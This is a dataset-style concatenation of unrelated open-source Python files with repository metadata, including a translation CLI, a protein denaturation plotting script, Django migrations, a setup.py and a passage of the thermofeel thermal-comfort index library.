print_translations(translations, limit)
print_synonyms(synonyms)
print_examples(examples, frm, dst)
def print_synonyms(synonyms):
    """Print a 'Synonyms:' header followed by a comma-separated list.

    Prints nothing when the list is empty.
    """
    if not synonyms:
        return
    print("Synonyms:")
    print("\t - ", ", ".join(synonyms))
def print_examples(examples, frm, dst, limit=5):
    """Print up to ``limit`` usage examples for a translation.

    :param examples: list of [source_html, translated_html] pairs; tags are
        stripped with BeautifulSoup before printing
    :param frm: source language code ('eng' or 'jpn')
    :param dst: destination language code ('eng' or 'jpn')
    :param limit: maximum number of examples to print
    """
    if len(examples) == 0:
        return
    print (crayons.white("Example:"))
    # Slice up front so exactly `limit` examples are shown; the previous
    # post-print `if i > limit: break` check printed limit + 2 of them.
    for example in examples[:limit]:
        example = list(map(lambda x: BeautifulSoup(x, "lxml").get_text(), example))
        if frm == 'eng' and dst == 'jpn':
            print (crayons.white("\tENG - {}".format(example[0])))
            print (crayons.white("\tJPN - {}".format(example[1])))
        elif frm == 'jpn' and dst == 'eng':
            print (crayons.white("\tJPN - {}".format(example[0])))
            print (crayons.white("\tENG - {}".format(example[1])))
    print()
def print_translations(translations, limit):
    """Print up to ``limit`` candidate translations, one per line.

    :param translations: list of translation strings
    :param limit: maximum number of translations to print
    """
    if len(translations) == 0:
        return
    print (crayons.white("Translation:"))
    # Slice up front so exactly `limit` entries are shown; the previous
    # post-print `if i > limit: break` check printed limit + 2 of them.
    for translation in translations[:limit]:
        print (crayons.white("\t - {}".format(translation)))
def _translate(phrase, frm, dst):
    """Run a Glosbe translation query and return the client holding the results.

    :param phrase: text to translate
    :param frm: source language code
    :param dst: destination language code
    :return: the Glosbe client after translate() has populated it
    """
    api = Glosbe(frm, dst)
    click.echo("translate... %s from %s to %s" % (crayons.red(phrase), crayons.blue(frm), crayons.blue(dst)))
    api.translate(phrase, tm=True)
    return api
def main():
    """CLI entry point: dispatch to the click command group."""
    cmd()


if __name__ == "__main__":
    main()
| 31.288288
| 137
| 0.576447
|
4a0a392b802c524b22ca757ed9cc3b0a78e7cfe7
| 2,625
|
py
|
Python
|
src/inhibitor_urea_denaturation/plot_proteins.py
|
dezeraecox-manuscripts/COX_Proteome-stability
|
a5397baae7f0bc73980b88f8ccf7b83e3d05f590
|
[
"MIT"
] | null | null | null |
src/inhibitor_urea_denaturation/plot_proteins.py
|
dezeraecox-manuscripts/COX_Proteome-stability
|
a5397baae7f0bc73980b88f8ccf7b83e3d05f590
|
[
"MIT"
] | null | null | null |
src/inhibitor_urea_denaturation/plot_proteins.py
|
dezeraecox-manuscripts/COX_Proteome-stability
|
a5397baae7f0bc73980b88f8ccf7b83e3d05f590
|
[
"MIT"
] | null | null | null |
import os
import re
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
import seaborn as sns
import matplotlib
from loguru import logger
from GEN_Utils import FileHandling
logger.info('Import OK')
# Global plot styling: 12 pt normal-weight font everywhere.
font = {'family' : 'normal',
        'weight' : 'normal',
        'size' : 12 }
matplotlib.rc('font', **font)
# Keep SVG text as editable text elements rather than rendered paths.
plt.rcParams['svg.fonttype'] = 'none'
# Input workbook produced by the detect_outliers step; per-protein plots are
# written to output_folder.
input_path = 'results/inhibitor_urea_denaturation/detect_outliers/outlier_summary.xlsx'
output_folder = 'results/inhibitor_urea_denaturation/plot_proteins/'

# os.makedirs creates missing parent directories too; the previous os.mkdir
# raised FileNotFoundError on a fresh checkout where
# 'results/inhibitor_urea_denaturation/' did not exist yet.
os.makedirs(output_folder, exist_ok=True)
# ----------------------Prepare raw data----------------------
# Read every sheet of the outlier-summary workbook into a
# {sheet_name: DataFrame} dict.
compiled = pd.read_excel(input_path, sheet_name=None)
# Drop the 'Unnamed: *' index columns that Excel round-tripping leaves behind.
compiled.update({key: df.drop([col for col in df.columns.tolist(
) if 'Unnamed: ' in str(col)], axis=1) for key, df in compiled.items()})

# collect outliers
outliers = compiled['outliers'].copy()

# Collect all peptides for each outlier protein
all_peps = compiled['summary'].copy()
# Keep rows with 'count' >= 7 (presumably a minimum-quantification filter —
# confirm against the detect_outliers step).
all_peps = all_peps[all_peps['count'] >= 7].copy()
all_peps['noncys_ratio_std'] = all_peps['noncys_ratio_std'].replace(
    0, np.nan)  # remove single-noncys-peptide proteins
all_peps.dropna(subset=['noncys_ratio_std'], inplace=True)
# One denaturation-curve figure per outlier protein: each line is a peptide,
# solid where flagged as an outlier, with a grey band at +/- one standard
# deviation of the non-cys ratios.
for protein in outliers['Proteins'].unique().tolist():
    protein_df = all_peps[all_peps['Proteins'] == protein].copy()
    # Keep only cysteine-containing peptides for this protein.
    protein_df = protein_df[protein_df['Sequence'].str.contains('C')].copy()
    # Black for cys-containing sequences, grey otherwise (after the filter
    # above every remaining sequence contains 'C', so all lines end up black).
    palette = {
        seq: 'black' if 'C' in seq else 'darkgrey' for seq in protein_df['Sequence'].tolist()}
    # Solid line for outlier peptides, dashed (2, 2) for the rest.
    dashes = {
        seq: '' if (outlier == 1) else (2, 2) for seq, outlier in protein_df[['Sequence', 'outlier']].values}
    # dashes = {1: '', 0: (2, 2)}
    # Long format: one row per (sequence, urea concentration); the non-string
    # column headers are taken to be the urea concentrations.
    for_plotting = pd.melt(
        protein_df,
        id_vars=['Sequence', 'outlier'],
        value_vars=[col for col in protein_df if type(col) != str],
        var_name='Urea Conc. (M)',
        value_name='Corrected cys ratio'
    ).dropna()
    thresh_band = protein_df['noncys_ratio_std'].tolist()[0]

    fig, ax = plt.subplots()
    sns.lineplot(
        data=for_plotting,
        x='Urea Conc. (M)',
        y='Corrected cys ratio',
        hue='Sequence',
        palette=palette,
        style='Sequence',
        dashes=dashes,
        marker='o'
    )
    # Grey band marking +/- one std dev of the non-cys peptide ratios.
    plt.fill_between(
        x=np.arange(0, 7),
        y1=-thresh_band,
        y2=thresh_band,
        color='lightgrey',
        alpha=0.5)
    plt.title(f'{protein}')
    plt.ylim(-1.25, 1.25)
    plt.legend(bbox_to_anchor=(1.0, 1.0))
    plt.savefig(f'{output_folder}{protein}.svg')
    plt.savefig(f'{output_folder}{protein}.png')
    plt.show()
    plt.clf()
| 31.25
| 109
| 0.645714
|
4a0a39d3be9377d8cb99fef8f0a1811180f97055
| 802
|
py
|
Python
|
phone_auth/migrations/0008_auto_20210409_2200.py
|
prateekcom/django-phone-auth
|
0af0333939304673657399db0cd762aee4778955
|
[
"MIT"
] | null | null | null |
phone_auth/migrations/0008_auto_20210409_2200.py
|
prateekcom/django-phone-auth
|
0af0333939304673657399db0cd762aee4778955
|
[
"MIT"
] | null | null | null |
phone_auth/migrations/0008_auto_20210409_2200.py
|
prateekcom/django-phone-auth
|
0af0333939304673657399db0cd762aee4778955
|
[
"MIT"
] | null | null | null |
# Generated by Django 3.1.7 on 2021-04-09 16:30
import django.db.models.deletion
from django.conf import settings
from django.db import migrations, models
class Migration(migrations.Migration):
    # Auto-generated migration: re-declares the user FK on EmailAddress and
    # PhoneNumber as a plain CASCADE ForeignKey to AUTH_USER_MODEL.
    # Do not edit applied migrations by hand.

    dependencies = [
        migrations.swappable_dependency(settings.AUTH_USER_MODEL),
        ('phone_auth', '0007_auto_20210409_2145'),
    ]

    operations = [
        migrations.AlterField(
            model_name='emailaddress',
            name='user',
            field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL),
        ),
        migrations.AlterField(
            model_name='phonenumber',
            name='user',
            field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL),
        ),
    ]
| 29.703704
| 110
| 0.663342
|
4a0a3b2840633965b1b56e52135ea33121d4d798
| 54
|
py
|
Python
|
joladnijo/__init__.py
|
joladnijo/joladnijo-backend
|
89240e3990ce9cdad86a1d212d28062c07a58edb
|
[
"MIT"
] | null | null | null |
joladnijo/__init__.py
|
joladnijo/joladnijo-backend
|
89240e3990ce9cdad86a1d212d28062c07a58edb
|
[
"MIT"
] | 40
|
2022-03-06T19:46:07.000Z
|
2022-03-27T11:50:02.000Z
|
joladnijo/__init__.py
|
joladnijo/joladnijo-backend
|
89240e3990ce9cdad86a1d212d28062c07a58edb
|
[
"MIT"
] | 1
|
2022-03-29T08:53:21.000Z
|
2022-03-29T08:53:21.000Z
|
# Points Django at the package's AppConfig.
# NOTE(review): default_app_config is deprecated since Django 3.2 and ignored
# on newer versions — presumably kept for older-Django compatibility; confirm
# before removing.
default_app_config = 'joladnijo.apps.JoladnijoConfig'
| 27
| 53
| 0.851852
|
4a0a3b6400096b01ad12c7a70f707572d5e23e1d
| 739
|
py
|
Python
|
setup.py
|
hibikisan2018/stockinfo
|
eea2ea71a697bcbb0454277c096e239e229e798e
|
[
"BSD-2-Clause"
] | 1
|
2018-05-13T05:39:52.000Z
|
2018-05-13T05:39:52.000Z
|
setup.py
|
hibikisan2018/stockinfo
|
eea2ea71a697bcbb0454277c096e239e229e798e
|
[
"BSD-2-Clause"
] | null | null | null |
setup.py
|
hibikisan2018/stockinfo
|
eea2ea71a697bcbb0454277c096e239e229e798e
|
[
"BSD-2-Clause"
] | null | null | null |
# -*- coding: utf-8 -*-
# Learn more: https://github.com/kennethreitz/setup.py
from setuptools import setup, find_packages
# Read the long description and licence text that setup() embeds in the
# package metadata. Explicit encoding avoids locale-dependent decoding.
with open('README.rst', encoding='utf-8') as f:
    readme = f.read()

with open('LICENSE', encoding='utf-8') as f:
    # Renamed from `license`: that name shadows the `license` builtin.
    license_text = f.read()

setup(
    name='stockinfo',
    version='0.1.0',
    description='Notifying N225 and USD/JPN through LINE notify',
    long_description=readme,
    author='hibikisan2018',
    author_email='hibikisan2010@gmail.com',
    install_requires=['requests', 'bs4'],
    url='https://github.com/hibikisan2018',
    # NOTE(review): passing the whole LICENSE file text here is unusual —
    # setuptools expects a short licence identifier; confirm intent.
    license=license_text,
    packages=find_packages(exclude=('tests', 'docs')),
    entry_points = {
        'console_scripts':[
            'stockinfo = stockinfo.sendLineMessage2:main',
        ],
    },
)
| 23.09375
| 65
| 0.644114
|
4a0a3d582033bfd86290c3077ac9afa5589a4fb1
| 120
|
py
|
Python
|
beginner/chapter_1/exam_1_6.py
|
Bokji24Dev/CodeStudy
|
4c0fc852e6f472d082e9836c59ad22d229f74d87
|
[
"MIT"
] | null | null | null |
beginner/chapter_1/exam_1_6.py
|
Bokji24Dev/CodeStudy
|
4c0fc852e6f472d082e9836c59ad22d229f74d87
|
[
"MIT"
] | null | null | null |
beginner/chapter_1/exam_1_6.py
|
Bokji24Dev/CodeStudy
|
4c0fc852e6f472d082e9836c59ad22d229f74d87
|
[
"MIT"
] | null | null | null |
# -*- coding:utf-8 -*-
# Concept
# A variable is a box that holds a value.
# Rule
# variable_name = value_to_store
과일상자 = "과일"  # "fruit box" holding the string "과일" ("fruit")
숫자상자 = 1  # "number box" holding an integer
print(과일상자)
print(숫자상자)
| 9.230769
| 22
| 0.566667
|
4a0a3d727541b2855a1862bd07e7c3e796ebc070
| 28,816
|
py
|
Python
|
thermofeel/thermofeel.py
|
milankl/thermofeel
|
5f7468c85bd9d06d556904dc767500dfec0712b2
|
[
"Apache-2.0"
] | null | null | null |
thermofeel/thermofeel.py
|
milankl/thermofeel
|
5f7468c85bd9d06d556904dc767500dfec0712b2
|
[
"Apache-2.0"
] | null | null | null |
thermofeel/thermofeel.py
|
milankl/thermofeel
|
5f7468c85bd9d06d556904dc767500dfec0712b2
|
[
"Apache-2.0"
] | null | null | null |
# (C) Copyright 1996- ECMWF.
#
# This software is licensed under the terms of the Apache Licence Version 2.0
# which can be obtained at http://www.apache.org/licenses/LICENSE-2.0.
# In applying this licence, ECMWF does not waive the privileges and immunities
# granted to it by virtue of its status as an intergovernmental organisation
# nor does it submit to any jurisdiction.
"""
thermofeel is a library to calculate human thermal comfort indexes.
Currently calculates the thermal indexes:
* Universal Thermal Climate Index
* Mean Radiant Temperature
* Mean Radiant Temperature from Wet Bulb Globe Temperature
* Heat Index Simplified
* Heat Index Adjusted
* Humidex
* Apparent Temperature
* Wind Chill
* Normal Effective Temperature (NET)
In support of the above indexes, it also calculates:
* Solar Declination Angle
* Solar Zenith Angle
* Relative Humidity Percentage
* Saturation vapour pressure
* Wet Bulb Globe Temperature Simple
* Wet Bulb Globe Temperature
"""
import math
import numpy as np
from .helpers import (
__wrap,
fahrenheit_to_celsius,
kelvin_to_fahrenheit,
kPa_to_hPa,
to_julian_date,
to_radians,
)
# solar declination angle [degrees] + time correction for solar angle
def solar_declination_angle(jd, h):
    """Return (declination [degrees], time correction [h.degrees]) for a
    day-of-year ``jd`` and hour ``h``.

    Both quantities are evaluated from trigonometric series in the
    fractional year angle.
    """
    # Fractional year in degrees, folded back into [0, 360].
    year_angle = (360 / 365.25) * (jd + (h / 24))
    while year_angle > 360:
        year_angle = year_angle - 360
    angle_rad = year_angle * to_radians

    # Series fit for the declination, in degrees.
    declination = (
        0.396372
        - 22.91327 * math.cos(angle_rad)
        + 4.025430 * math.sin(angle_rad)
        - 0.387205 * math.cos(2 * angle_rad)
        + 0.051967 * math.sin(2 * angle_rad)
        - 0.154527 * math.cos(3 * angle_rad)
        + 0.084798 * math.sin(3 * angle_rad)
    )

    # Time correction for the solar angle, in hour-degrees.
    time_correction = (
        0.004297
        + 0.107029 * math.cos(angle_rad)
        - 1.837877 * math.sin(angle_rad)
        - 0.837378 * math.cos(2 * angle_rad)
        - 2.340475 * math.sin(2 * angle_rad)
    )

    return declination, time_correction
def calculate_relative_humidity_percent(t2m, td):
    """
    Calculate relative humidity in percent
    :param t2m: (float array) 2m temperature [K]
    :param td: (float array) dew point temperature [K]
    returns relative humidity [%]
    """
    t2m = __wrap(t2m)
    td = __wrap(td)

    # NOTE(review): kelvin_to_celsius is not among the names this module
    # imports from .helpers (only kelvin_to_fahrenheit is visible) — confirm
    # it is defined or imported elsewhere in this file.
    t2m = kelvin_to_celsius(t2m)
    td = kelvin_to_celsius(td)

    # Magnus-type formula: saturation vapour pressure at the air temperature,
    # actual vapour pressure at the dew point; RH is their ratio.
    # saturated vapour pressure
    es = 6.11 * 10.0 ** (7.5 * t2m / (237.3 + t2m))
    # vapour pressure
    e = 6.11 * 10.0 ** (7.5 * td / (237.3 + td))

    rh = (e / es) * 100

    return rh
def calculate_saturation_vapour_pressure(t2m):
    """
    Calculate saturation vapour pressure over water
    :param t2m: (float array) 2m temperature [K]
    returns relative humidity [hPa]
    http://www.thunderscientific.com/tech_info/reflibrary/its90formulas.pdf
    """
    tk = __wrap(t2m)

    # ITS-90 fit coefficients (see the reference above): g[0..6] multiply
    # powers tk**(-2)..tk**4 and g[7] multiplies ln(tk).
    g = [
        -2.8365744e3,
        -6.028076559e3,
        1.954263612e1,
        -2.737830188e-2,
        1.6261698e-5,
        7.0229056e-10,
        -1.8680009e-13,
        2.7150305,
    ]

    ess = g[7] * np.log(tk)
    for i in range(7):
        ess += g[i] * np.power(tk, (i - 2))

    # The formula yields Pa; scale to hPa.
    ess = np.exp(ess) * 0.01  # hPa

    return ess
def calculate_cos_solar_zenith_angle(h, lat, lon, y, m, d):
    """
    calculate solar zenith angle
    :param h: hour [int]
    :param lat: (float array) latitude [degrees]
    :param lon: (float array) longitude [degrees]
    :param y: year [int]
    :param m: month [int]
    :param d: day [int]
    https://agupubs.onlinelibrary.wiley.com/doi/epdf/10.1002/2015GL066868
    see also:
    http://answers.google.com/answers/threadview/id/782886.html
    returns cosine of the solar zenith angle, clipped to 0 below the horizon
    """
    # convert to julian days counting from the beginning of the year
    jd_ = to_julian_date(d, m, y)  # julian date of data
    jd11_ = to_julian_date(1, 1, y)  # julian date 1st Jan
    jd = jd_ - jd11_ + 1  # days since start of year

    # declination angle + time correction for solar angle
    d, tc = solar_declination_angle(jd, h)
    drad = d * to_radians
    latrad = lat * to_radians

    sindec_sinlat = np.sin(drad) * np.sin(latrad)
    cosdec_coslat = np.cos(drad) * np.cos(latrad)

    # solar hour angle [h.deg]: 15 degrees per hour from local solar noon,
    # shifted by longitude and the time correction.
    sharad = ((h - 12) * 15 + lon + tc) * to_radians
    csza = sindec_sinlat + cosdec_coslat * np.cos(sharad)

    # Negative cosines correspond to the sun below the horizon; clamp to 0.
    return np.clip(csza, 0, None)
def calculate_cos_solar_zenith_angle_integrated(
    lat, lon, y, m, d, h, tbegin, tend, intervals_per_hour=1, integration_order=3
):
    """
    Calculate the time-averaged cosine of the solar zenith angle by Gaussian
    numerical integration over [tbegin, tend].

    :param lat: (int array) latitude [degrees]
    :param lon: (int array) longitude [degrees]
    :param y: year [int]
    :param m: month [int]
    :param d: day [int]
    :param h: hour [int]
    :param tbegin: offset in hours from forecast time to begin of time interval for integration [int]
    :param tend: offset in hours from forecast time to end of time interval for integration [int]
    :param intervals_per_hour: number of time integrations per hour [int]
    :param integration_order: order of gauss integration [int] valid = (1, 2, 3, 4)
    :raises ValueError: if integration_order is not one of 1, 2, 3, 4
    https://agupubs.onlinelibrary.wiley.com/doi/epdf/10.1002/2015GL066868
    This uses Gaussian numerical integration. See https://en.wikipedia.org/wiki/Gaussian_quadrature
    returns average of cosine of the solar zenith angle during interval [degrees]
    """
    # Gauss-Legendre abscissae (E) and weights (W) on the interval [-1, 1].
    if integration_order == 1:  # fastest, worst accuracy (1 point)
        E = np.array([0.0])
        W = np.array([2.0])
    elif integration_order == 2:  # faster, less accurate (2 points)
        E = np.array([-1.0 / math.sqrt(3.0), 1.0 / math.sqrt(3.0)])
        W = np.array([1.0, 1.0])
    elif integration_order == 3:  # default, good speed and accuracy (3 points)
        E = np.array([-math.sqrt(3.0 / 5.0), 0.0, math.sqrt(3.0 / 5.0)])
        W = np.array([5.0 / 9.0, 8.0 / 9.0, 5.0 / 9.0])
    elif integration_order == 4:  # slower, more accurate (4 points)
        E = np.array(
            [
                -math.sqrt(3.0 / 7.0 + 2.0 / 7.0 * math.sqrt(6.0 / 5.0)),
                -math.sqrt(3.0 / 7.0 - 2.0 / 7.0 * math.sqrt(6.0 / 5.0)),
                math.sqrt(3.0 / 7.0 - 2.0 / 7.0 * math.sqrt(6.0 / 5.0)),
                math.sqrt(3.0 / 7.0 + 2.0 / 7.0 * math.sqrt(6.0 / 5.0)),
            ]
        )
        W = np.array(
            [
                (18 - math.sqrt(30)) / 36,
                (18 + math.sqrt(30)) / 36,
                (18 + math.sqrt(30)) / 36,
                (18 - math.sqrt(30)) / 36,
            ]
        )
    else:
        raise ValueError(f"Invalid integration_order {integration_order}")
    assert intervals_per_hour > 0
    nsplits = (tend - tbegin) * intervals_per_hour
    assert nsplits > 0
    # split the interval into nsplits sub-intervals and apply the quadrature
    # rule on each; the sub-interval results are accumulated into `integral`
    time_steps = np.linspace(tbegin, tend, num=nsplits + 1)
    integral = np.zeros_like(lat)
    for s in range(len(time_steps) - 1):
        ti = time_steps[s]
        tf = time_steps[s + 1]
        deltat = tf - ti
        jacob = deltat / 2.0  # jacobian of the map [-1, 1] -> [ti, tf]
        w = jacob * W
        w /= tend - tbegin  # divide here so the sum is the interval average
        t = jacob * E
        t += (tf + ti) / 2.0  # quadrature nodes in hour offsets
        for n in range(len(w)):
            cossza = calculate_cos_solar_zenith_angle(
                lat=lat, lon=lon, y=y, m=m, d=d, h=(h + t[n])
            )
            integral += w[n] * cossza
    return integral
def calculate_mean_radiant_temperature(ssrd, ssr, fdir, strd, strr, cossza):
    """
    mrt - Mean Radiant Temperature

    :param ssrd: is surface solar radiation downwards [J/m^-2]
    :param ssr: is surface net solar radiation [J/m^-2]
    :param fdir: is Total sky direct solar radiation at surface [J/m^-2]
    :param strd: is Surface thermal radiation downwards [J/m^-2]
    :param strr: is Surface net thermal radiation [J/m^-2]
    :param cossza: is cosine of solar zenith angle
    returns Mean Radiant Temperature [K]
    """
    dsw = ssrd - fdir  # diffuse short-wave
    rsw = ssrd - ssr  # reflected short-wave
    lur = strd - strr  # upwelling long-wave
    # projected area factor fp from the solar elevation angle gamma [deg]
    gamma = np.arcsin(cossza) * 180 / np.pi
    fp = 0.308 * np.cos(to_radians * gamma * 0.998 - (gamma * gamma / 50000))
    # Normalise the direct radiation by cos(sza) where the sun is up.
    # Work on a copy: the original wrote through the caller's `fdir`
    # array, silently mutating the argument.
    fdir = np.array(fdir, copy=True)
    sun_up = np.where(cossza > 0.01)
    fdir[sun_up] = fdir[sun_up] / cossza[sun_up]
    # mean radiant temperature from the radiation balance
    # (0.0000000567 is the Stefan-Boltzmann constant, 0.7/0.97 the
    # absorption/emissivity ratio)
    mrt = np.power(
        (
            (1 / 0.0000000567)
            * (
                0.5 * strd
                + 0.5 * lur
                + (0.7 / 0.97) * (0.5 * dsw + 0.5 * rsw + fp * fdir)
            )
        ),
        0.25,
    )
    return mrt
def calculate_utci(t2_k, va_ms, mrt_k, e_hPa=None, td_k=None):
    """
    UTCI - Universal Thermal Climate Index

    :param t2_k: (float array) is 2m temperature [K]
    :param va_ms: (float array) is wind speed at 10 meters [m/s]
    :param mrt_k: (float array) is mean radiant temperature [K]
    :param e_hPa: (float array) is water vapour pressure [hPa] (optional)
    :param td_k: (float array) is 2m dew point temperature [K]; used to derive
        the vapour pressure when e_hPa is not given
    :raises ValueError: if neither e_hPa nor td_k is provided

    Calculate UTCI with a 6th order polynomial approximation according to:
    Brode, P. et al. Deriving the operational procedure for the
    Universal Thermal Climate Index (UTCI). Int J Biometeorol (2012) 56: 481.

    Fix vs. the original transcription: in the published polynomial the
    -4.52166564e-07 coefficient multiplies Ta^2 * D_Tmrt^2; the original
    applied it to Ta * D_Tmrt^2.

    returns UTCI [°C]
    """
    t2 = __wrap(t2_k)
    va = __wrap(va_ms)
    mrt_kw = __wrap(mrt_k)
    # vapour pressure: either supplied directly, or derived from dew point
    if e_hPa is not None:
        ehPa = __wrap(e_hPa)
        rh = ehPa / 10.0  # rh in kPa
    elif td_k is not None:
        t2d = __wrap(td_k)
        rh_pc = calculate_relative_humidity_percent(t2, t2d)
        ehPa = calculate_saturation_vapour_pressure(t2) * rh_pc / 100.0
        rh = ehPa / 10.0  # rh in kPa
    else:
        raise ValueError("Missing input e_hPa or td_k")
    t2m = kelvin_to_celsius(t2)  # polynomial approx. is in Celsius
    mrt = kelvin_to_celsius(mrt_kw)  # polynomial approx. is in Celsius
    e_mrt = np.subtract(mrt, t2m)  # D_Tmrt in the paper
    # precompute the powers used by the polynomial
    t2m2 = t2m * t2m
    t2m3 = t2m2 * t2m
    t2m4 = t2m3 * t2m
    t2m5 = t2m4 * t2m
    t2m6 = t2m5 * t2m
    va2 = va * va
    va3 = va2 * va
    va4 = va3 * va
    va5 = va4 * va
    va6 = va5 * va
    e_mrt2 = e_mrt * e_mrt
    e_mrt3 = e_mrt2 * e_mrt
    e_mrt4 = e_mrt3 * e_mrt
    e_mrt5 = e_mrt4 * e_mrt
    e_mrt6 = e_mrt5 * e_mrt
    rh2 = rh * rh
    rh3 = rh2 * rh
    rh4 = rh3 * rh
    rh5 = rh4 * rh
    rh6 = rh5 * rh
    # 6th-order polynomial offset added to the air temperature (Brode et al.)
    utci = (
        t2m
        + 6.07562052e-01
        + -2.27712343e-02 * t2m
        + 8.06470249e-04 * t2m2
        + -1.54271372e-04 * t2m3
        + -3.24651735e-06 * t2m4
        + 7.32602852e-08 * t2m5
        + 1.35959073e-09 * t2m6
        + -2.25836520e00 * va
        + 8.80326035e-02 * t2m * va
        + 2.16844454e-03 * t2m2 * va
        + -1.53347087e-05 * t2m3 * va
        + -5.72983704e-07 * t2m4 * va
        + -2.55090145e-09 * t2m5 * va
        + -7.51269505e-01 * va2
        + -4.08350271e-03 * t2m * va2
        + -5.21670675e-05 * t2m2 * va2
        + 1.94544667e-06 * t2m3 * va2
        + 1.14099531e-08 * t2m4 * va2
        + 1.58137256e-01 * va3
        + -6.57263143e-05 * t2m * va3
        + 2.22697524e-07 * t2m2 * va3
        + -4.16117031e-08 * t2m3 * va3
        + -1.27762753e-02 * va4
        + 9.66891875e-06 * t2m * va4
        + 2.52785852e-09 * t2m2 * va4
        + 4.56306672e-04 * va5
        + -1.74202546e-07 * t2m * va5
        + -5.91491269e-06 * va6
        + 3.98374029e-01 * e_mrt
        + 1.83945314e-04 * t2m * e_mrt
        + -1.73754510e-04 * t2m2 * e_mrt
        + -7.60781159e-07 * t2m3 * e_mrt
        + 3.77830287e-08 * t2m4 * e_mrt
        + 5.43079673e-10 * t2m5 * e_mrt
        + -2.00518269e-02 * va * e_mrt
        + 8.92859837e-04 * t2m * va * e_mrt
        + 3.45433048e-06 * t2m2 * va * e_mrt
        + -3.77925774e-07 * t2m3 * va * e_mrt
        + -1.69699377e-09 * t2m4 * va * e_mrt
        + 1.69992415e-04 * va2 * e_mrt
        + -4.99204314e-05 * t2m * va2 * e_mrt
        + 2.47417178e-07 * t2m2 * va2 * e_mrt
        + 1.07596466e-08 * t2m3 * va2 * e_mrt
        + 8.49242932e-05 * va3 * e_mrt
        + 1.35191328e-06 * t2m * va3 * e_mrt
        + -6.21531254e-09 * t2m2 * va3 * e_mrt
        + -4.99410301e-06 * va4 * e_mrt
        + -1.89489258e-08 * t2m * va4 * e_mrt
        + 8.15300114e-08 * va5 * e_mrt
        + 7.55043090e-04 * e_mrt2
        + -5.65095215e-05 * t2m * e_mrt2
        + -4.52166564e-07 * t2m2 * e_mrt2  # fixed: was t2m in the original
        + 2.46688878e-08 * t2m3 * e_mrt2
        + 2.42674348e-10 * t2m4 * e_mrt2
        + 1.54547250e-04 * va * e_mrt2
        + 5.24110970e-06 * t2m * va * e_mrt2
        + -8.75874982e-08 * t2m2 * va * e_mrt2
        + -1.50743064e-09 * t2m3 * va * e_mrt2
        + -1.56236307e-05 * va2 * e_mrt2
        + -1.33895614e-07 * t2m * va2 * e_mrt2
        + 2.49709824e-09 * t2m2 * va2 * e_mrt2
        + 6.51711721e-07 * va3 * e_mrt2
        + 1.94960053e-09 * t2m * va3 * e_mrt2
        + -1.00361113e-08 * va4 * e_mrt2
        + -1.21206673e-05 * e_mrt3
        + -2.18203660e-07 * t2m * e_mrt3
        + 7.51269482e-09 * t2m2 * e_mrt3
        + 9.79063848e-11 * t2m3 * e_mrt3
        + 1.25006734e-06 * va * e_mrt3
        + -1.81584736e-09 * t2m * va * e_mrt3
        + -3.52197671e-10 * t2m2 * va * e_mrt3
        + -3.36514630e-08 * va2 * e_mrt3
        + 1.35908359e-10 * t2m * va2 * e_mrt3
        + 4.17032620e-10 * va3 * e_mrt3
        + -1.30369025e-09 * e_mrt4
        + 4.13908461e-10 * t2m * e_mrt4
        + 9.22652254e-12 * t2m2 * e_mrt4
        + -5.08220384e-09 * va * e_mrt4
        + -2.24730961e-11 * t2m * va * e_mrt4
        + 1.17139133e-10 * va2 * e_mrt4
        + 6.62154879e-10 * e_mrt5
        + 4.03863260e-13 * t2m * e_mrt5
        + 1.95087203e-12 * va * e_mrt5
        + -4.73602469e-12 * e_mrt6
        + 5.12733497e00 * rh
        + -3.12788561e-01 * t2m * rh
        + -1.96701861e-02 * t2m2 * rh
        + 9.99690870e-04 * t2m3 * rh
        + 9.51738512e-06 * t2m4 * rh
        + -4.66426341e-07 * t2m5 * rh
        + 5.48050612e-01 * va * rh
        + -3.30552823e-03 * t2m * va * rh
        + -1.64119440e-03 * t2m2 * va * rh
        + -5.16670694e-06 * t2m3 * va * rh
        + 9.52692432e-07 * t2m4 * va * rh
        + -4.29223622e-02 * va2 * rh
        + 5.00845667e-03 * t2m * va2 * rh
        + 1.00601257e-06 * t2m2 * va2 * rh
        + -1.81748644e-06 * t2m3 * va2 * rh
        + -1.25813502e-03 * va3 * rh
        + -1.79330391e-04 * t2m * va3 * rh
        + 2.34994441e-06 * t2m2 * va3 * rh
        + 1.29735808e-04 * va4 * rh
        + 1.29064870e-06 * t2m * va4 * rh
        + -2.28558686e-06 * va5 * rh
        + -3.69476348e-02 * e_mrt * rh
        + 1.62325322e-03 * t2m * e_mrt * rh
        + -3.14279680e-05 * t2m2 * e_mrt * rh
        + 2.59835559e-06 * t2m3 * e_mrt * rh
        + -4.77136523e-08 * t2m4 * e_mrt * rh
        + 8.64203390e-03 * va * e_mrt * rh
        + -6.87405181e-04 * t2m * va * e_mrt * rh
        + -9.13863872e-06 * t2m2 * va * e_mrt * rh
        + 5.15916806e-07 * t2m3 * va * e_mrt * rh
        + -3.59217476e-05 * va2 * e_mrt * rh
        + 3.28696511e-05 * t2m * va2 * e_mrt * rh
        + -7.10542454e-07 * t2m2 * va2 * e_mrt * rh
        + -1.24382300e-05 * va3 * e_mrt * rh
        + -7.38584400e-09 * t2m * va3 * e_mrt * rh
        + 2.20609296e-07 * va4 * e_mrt * rh
        + -7.32469180e-04 * e_mrt2 * rh
        + -1.87381964e-05 * t2m * e_mrt2 * rh
        + 4.80925239e-06 * t2m2 * e_mrt2 * rh
        + -8.75492040e-08 * t2m3 * e_mrt2 * rh
        + 2.77862930e-05 * va * e_mrt2 * rh
        + -5.06004592e-06 * t2m * va * e_mrt2 * rh
        + 1.14325367e-07 * t2m2 * va * e_mrt2 * rh
        + 2.53016723e-06 * va2 * e_mrt2 * rh
        + -1.72857035e-08 * t2m * va2 * e_mrt2 * rh
        + -3.95079398e-08 * va3 * e_mrt2 * rh
        + -3.59413173e-07 * e_mrt3 * rh
        + 7.04388046e-07 * t2m * e_mrt3 * rh
        + -1.89309167e-08 * t2m2 * e_mrt3 * rh
        + -4.79768731e-07 * va * e_mrt3 * rh
        + 7.96079978e-09 * t2m * va * e_mrt3 * rh
        + 1.62897058e-09 * va2 * e_mrt3 * rh
        + 3.94367674e-08 * e_mrt4 * rh
        + -1.18566247e-09 * t2m * e_mrt4 * rh
        + 3.34678041e-10 * va * e_mrt4 * rh
        + -1.15606447e-10 * e_mrt5 * rh
        + -2.80626406e00 * rh2
        + 5.48712484e-01 * t2m * rh2
